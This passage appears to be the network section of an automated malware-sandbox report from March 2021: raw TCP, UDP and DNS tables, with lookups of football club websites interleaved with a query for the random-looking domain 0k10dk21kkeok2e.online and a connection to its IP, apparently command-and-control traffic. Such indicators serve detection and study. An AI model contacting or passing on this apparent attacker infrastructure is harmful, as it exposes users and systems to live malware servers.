                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.516637087 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.516680002 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.516716003 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.516757011 CET49734443192.168.2.499.86.159.34
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.519773006 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.519818068 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.519855976 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.520968914 CET49734443192.168.2.499.86.159.34
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.521604061 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.521646976 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.521686077 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.521976948 CET49734443192.168.2.499.86.159.34
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.522030115 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.522116899 CET49734443192.168.2.499.86.159.34
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.530569077 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.530644894 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.530788898 CET49734443192.168.2.499.86.159.34
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.532691002 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.532733917 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.532769918 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.532810926 CET49734443192.168.2.499.86.159.34
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.533108950 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.533162117 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.533191919 CET49734443192.168.2.499.86.159.34
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.533216000 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.533314943 CET49734443192.168.2.499.86.159.34
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.535331011 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.535370111 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.535401106 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.535439968 CET49734443192.168.2.499.86.159.34
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.536389112 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.536442995 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.536492109 CET49734443192.168.2.499.86.159.34
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.536524057 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.536591053 CET49734443192.168.2.499.86.159.34
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.539659023 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.539697886 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.539732933 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.540209055 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.540244102 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.540263891 CET49734443192.168.2.499.86.159.34
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.540294886 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.540333033 CET49734443192.168.2.499.86.159.34
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.540369987 CET49734443192.168.2.499.86.159.34
                                                                                                                                                                                                                        Mar 2, 2021 20:09:26.948513985 CET4973380192.168.2.499.86.159.29
                                                                                                                                                                                                                        Mar 2, 2021 20:09:26.949320078 CET4972980192.168.2.4104.21.59.148
                                                                                                                                                                                                                        Mar 2, 2021 20:09:26.949821949 CET49734443192.168.2.499.86.159.34

                                                                                                                                                                                                                        UDP Packets

                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                        Mar 2, 2021 20:08:40.142725945 CET5992053192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:08:40.145757914 CET53491828.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:40.193378925 CET53599208.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:45.385822058 CET5745853192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:08:45.436705112 CET53574588.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:49.703531981 CET5057953192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:08:49.749269009 CET53505798.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:50.496838093 CET5170353192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:08:50.548437119 CET53517038.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:50.555720091 CET6524853192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:08:50.613651037 CET53652488.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:50.733742952 CET5372353192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:08:50.779699087 CET53537238.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:50.791078091 CET6464653192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:08:50.838902950 CET53646468.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:50.976568937 CET6529853192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:08:51.037338972 CET53652988.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:51.044329882 CET5912353192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:08:51.094420910 CET5453153192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:08:51.119118929 CET53591238.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:51.143196106 CET53545318.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:51.220598936 CET4971453192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:08:51.268189907 CET53497148.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:51.276549101 CET5802853192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:08:51.330665112 CET53580288.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:51.943490982 CET5309753192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:08:51.989768028 CET53530978.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:52.714257956 CET4925753192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:08:52.762525082 CET53492578.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:54.146941900 CET6238953192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:08:54.195518970 CET53623898.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:54.404633999 CET4991053192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:08:54.464396954 CET53499108.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:54.475603104 CET5585453192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:08:54.527645111 CET53558548.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:54.659347057 CET6454953192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:08:54.714083910 CET53645498.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:54.722321033 CET6315353192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:08:54.771481037 CET53631538.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:54.868302107 CET5299153192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:08:54.927212954 CET53529918.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:55.016172886 CET5370053192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:08:55.065306902 CET53537008.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:55.896138906 CET5172653192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:08:55.943336010 CET53517268.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.714442015 CET5679453192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.759996891 CET53567948.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:57.374126911 CET5653453192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:08:57.442032099 CET53565348.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:57.455888987 CET5662753192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:08:57.514110088 CET53566278.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:57.613251925 CET5662153192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:08:57.668900013 CET53566218.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:57.678607941 CET6311653192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:08:57.735830069 CET53631168.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:57.842261076 CET6407853192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:08:57.888057947 CET53640788.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.549834967 CET6480153192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.613145113 CET53648018.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.621834040 CET6172153192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.673063993 CET53617218.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.762552977 CET5125553192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.814052105 CET53512558.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.823421955 CET6152253192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.836925030 CET5233753192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.869771004 CET53615228.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.882772923 CET53523378.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:59.884916067 CET5504653192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:08:59.930783033 CET53550468.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:09:01.005407095 CET4961253192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:09:01.064692020 CET53496128.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:09:01.994808912 CET4928553192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:09:02.040421963 CET53492858.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:09:03.993841887 CET5060153192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:09:04.042778015 CET53506018.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:09:05.597374916 CET6087553192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:09:05.645148039 CET53608758.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:09:05.799443007 CET5644853192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:09:05.845248938 CET53564488.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:09:08.235846043 CET5917253192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:09:08.237066031 CET6242053192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:09:08.239526033 CET6057953192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:09:08.282471895 CET53591728.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:09:08.285128117 CET53605798.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:09:08.286020041 CET53624208.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:09:08.903247118 CET5018353192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:09:08.949892044 CET53501838.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:09:09.930087090 CET6153153192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:09:09.978732109 CET53615318.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:09:10.032285929 CET4922853192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:09:10.103822947 CET53492288.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:09:11.408025980 CET5979453192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:09:11.453669071 CET53597948.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:09:11.504482031 CET5591653192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:09:11.552076101 CET53559168.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:09:11.557714939 CET5275253192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:09:11.618345976 CET53527528.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:09:12.364268064 CET6054253192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:09:12.416336060 CET53605428.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:09:13.524030924 CET6068953192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:09:13.572956085 CET53606898.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:09:14.446058035 CET6420653192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:09:14.493865013 CET53642068.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:09:26.695353031 CET5090453192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:09:26.756505013 CET53509048.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:09:37.135029078 CET5752553192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:09:37.183278084 CET53575258.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:09:48.398874998 CET5381453192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:09:48.444895983 CET53538148.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:10:33.684509039 CET5341853192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:10:33.730535984 CET53534188.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:10:44.537988901 CET6283353192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:10:44.597537041 CET53628338.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:10:55.559895039 CET5926053192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:10:55.646528959 CET53592608.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:10:56.091029882 CET4994453192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:10:56.148238897 CET53499448.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:10:56.665596962 CET6330053192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:10:56.733863115 CET53633008.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:10:57.221560955 CET6144953192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:10:57.305548906 CET53614498.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:10:57.916225910 CET5127553192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:10:57.988899946 CET53512758.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:10:58.434609890 CET6349253192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:10:58.486139059 CET53634928.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:10:58.895148993 CET5894553192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:10:58.959903002 CET53589458.8.8.8192.168.2.4

                                                                                                                                                                                                                        DNS Queries

                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                                                        Mar 2, 2021 20:08:50.496838093 CET192.168.2.48.8.8.80x75e3Standard query (0)www.chelseafc.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:50.555720091 CET192.168.2.48.8.8.80x568cStandard query (0)www.chelseafc.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:50.733742952 CET192.168.2.48.8.8.80x98eeStandard query (0)www.chelseafc.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:50.791078091 CET192.168.2.48.8.8.80xb707Standard query (0)www.chelseafc.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:50.976568937 CET192.168.2.48.8.8.80x392fStandard query (0)www.manutd.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:51.044329882 CET192.168.2.48.8.8.80xf565Standard query (0)www.manutd.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:51.220598936 CET192.168.2.48.8.8.80xc36cStandard query (0)www.manutd.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:51.276549101 CET192.168.2.48.8.8.80x194eStandard query (0)www.manutd.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:54.404633999 CET192.168.2.48.8.8.80x58b4Standard query (0)www.mancity.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:54.475603104 CET192.168.2.48.8.8.80x5fa5Standard query (0)www.mancity.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:54.659347057 CET192.168.2.48.8.8.80x12feStandard query (0)www.mancity.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:54.722321033 CET192.168.2.48.8.8.80xbcbbStandard query (0)www.mancity.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:54.868302107 CET192.168.2.48.8.8.80x39b6Standard query (0)0k10dk21kkeok2e.onlineA (IP address)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:57.374126911 CET192.168.2.48.8.8.80x50d5Standard query (0)www.liverpoolfc.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:57.455888987 CET192.168.2.48.8.8.80x7e24Standard query (0)www.liverpoolfc.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:57.613251925 CET192.168.2.48.8.8.80x4656Standard query (0)www.liverpoolfc.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:57.678607941 CET192.168.2.48.8.8.80xee4eStandard query (0)www.liverpoolfc.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.549834967 CET192.168.2.48.8.8.80x50afStandard query (0)www.realmadrid.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.621834040 CET192.168.2.48.8.8.80x7a30Standard query (0)www.realmadrid.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.762552977 CET192.168.2.48.8.8.80x3cfdStandard query (0)www.realmadrid.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.823421955 CET192.168.2.48.8.8.80x4609Standard query (0)www.realmadrid.comA (IP address)IN (0x0001)

                                                                                                                                                                                                                        DNS Answers

                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                                                        Mar 2, 2021 20:08:50.548437119 CET8.8.8.8192.168.2.40x75e3No error (0)www.chelseafc.comchelseafc.map.fastly.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:50.548437119 CET8.8.8.8192.168.2.40x75e3No error (0)chelseafc.map.fastly.net151.101.2.133A (IP address)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:50.548437119 CET8.8.8.8192.168.2.40x75e3No error (0)chelseafc.map.fastly.net151.101.66.133A (IP address)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:50.548437119 CET8.8.8.8192.168.2.40x75e3No error (0)chelseafc.map.fastly.net151.101.130.133A (IP address)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:50.548437119 CET8.8.8.8192.168.2.40x75e3No error (0)chelseafc.map.fastly.net151.101.194.133A (IP address)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:50.613651037 CET8.8.8.8192.168.2.40x568cNo error (0)www.chelseafc.comchelseafc.map.fastly.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:50.613651037 CET8.8.8.8192.168.2.40x568cNo error (0)chelseafc.map.fastly.net151.101.2.133A (IP address)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:50.613651037 CET8.8.8.8192.168.2.40x568cNo error (0)chelseafc.map.fastly.net151.101.66.133A (IP address)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:50.613651037 CET8.8.8.8192.168.2.40x568cNo error (0)chelseafc.map.fastly.net151.101.130.133A (IP address)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:50.613651037 CET8.8.8.8192.168.2.40x568cNo error (0)chelseafc.map.fastly.net151.101.194.133A (IP address)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:50.779699087 CET8.8.8.8192.168.2.40x98eeNo error (0)www.chelseafc.comchelseafc.map.fastly.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:50.779699087 CET8.8.8.8192.168.2.40x98eeNo error (0)chelseafc.map.fastly.net151.101.2.133A (IP address)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:50.779699087 CET8.8.8.8192.168.2.40x98eeNo error (0)chelseafc.map.fastly.net151.101.66.133A (IP address)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:50.779699087 CET8.8.8.8192.168.2.40x98eeNo error (0)chelseafc.map.fastly.net151.101.130.133A (IP address)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:50.779699087 CET8.8.8.8192.168.2.40x98eeNo error (0)chelseafc.map.fastly.net151.101.194.133A (IP address)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:50.838902950 CET8.8.8.8192.168.2.40xb707No error (0)www.chelseafc.comchelseafc.map.fastly.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:50.838902950 CET8.8.8.8192.168.2.40xb707No error (0)chelseafc.map.fastly.net151.101.2.133A (IP address)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:50.838902950 CET8.8.8.8192.168.2.40xb707No error (0)chelseafc.map.fastly.net151.101.66.133A (IP address)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:50.838902950 CET8.8.8.8192.168.2.40xb707No error (0)chelseafc.map.fastly.net151.101.130.133A (IP address)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:50.838902950 CET8.8.8.8192.168.2.40xb707No error (0)chelseafc.map.fastly.net151.101.194.133A (IP address)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:51.037338972 CET8.8.8.8192.168.2.40x392fNo error (0)www.manutd.comwww.manutd.com.edgekey.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:51.119118929 CET8.8.8.8192.168.2.40xf565No error (0)www.manutd.comwww.manutd.com.edgekey.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:51.268189907 CET8.8.8.8192.168.2.40xc36cNo error (0)www.manutd.comwww.manutd.com.edgekey.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:51.330665112 CET8.8.8.8192.168.2.40x194eNo error (0)www.manutd.comwww.manutd.com.edgekey.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:54.464396954 CET8.8.8.8192.168.2.40x58b4No error (0)www.mancity.comwww.mancity.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:54.527645111 CET8.8.8.8192.168.2.40x5fa5No error (0)www.mancity.comwww.mancity.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:54.714083910 CET8.8.8.8192.168.2.40x12feNo error (0)www.mancity.comwww.mancity.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:54.771481037 CET8.8.8.8192.168.2.40xbcbbNo error (0)www.mancity.comwww.mancity.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:54.927212954 CET8.8.8.8192.168.2.40x39b6No error (0)0k10dk21kkeok2e.online104.21.59.148A (IP address)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:54.927212954 CET8.8.8.8192.168.2.40x39b6No error (0)0k10dk21kkeok2e.online172.67.179.188A (IP address)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:57.442032099 CET8.8.8.8192.168.2.40x50d5No error (0)www.liverpoolfc.comd2hhwit6pbhmvu.cloudfront.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:57.442032099 CET8.8.8.8192.168.2.40x50d5No error (0)d2hhwit6pbhmvu.cloudfront.net99.86.159.29A (IP address)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:57.442032099 CET8.8.8.8192.168.2.40x50d5No error (0)d2hhwit6pbhmvu.cloudfront.net99.86.159.34A (IP address)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:57.442032099 CET8.8.8.8192.168.2.40x50d5No error (0)d2hhwit6pbhmvu.cloudfront.net99.86.159.58A (IP address)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:57.442032099 CET8.8.8.8192.168.2.40x50d5No error (0)d2hhwit6pbhmvu.cloudfront.net99.86.159.103A (IP address)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:57.514110088 CET8.8.8.8192.168.2.40x7e24No error (0)www.liverpoolfc.comd2hhwit6pbhmvu.cloudfront.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:57.514110088 CET8.8.8.8192.168.2.40x7e24No error (0)d2hhwit6pbhmvu.cloudfront.net99.86.159.34A (IP address)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:57.514110088 CET8.8.8.8192.168.2.40x7e24No error (0)d2hhwit6pbhmvu.cloudfront.net99.86.159.58A (IP address)IN (0x0001)
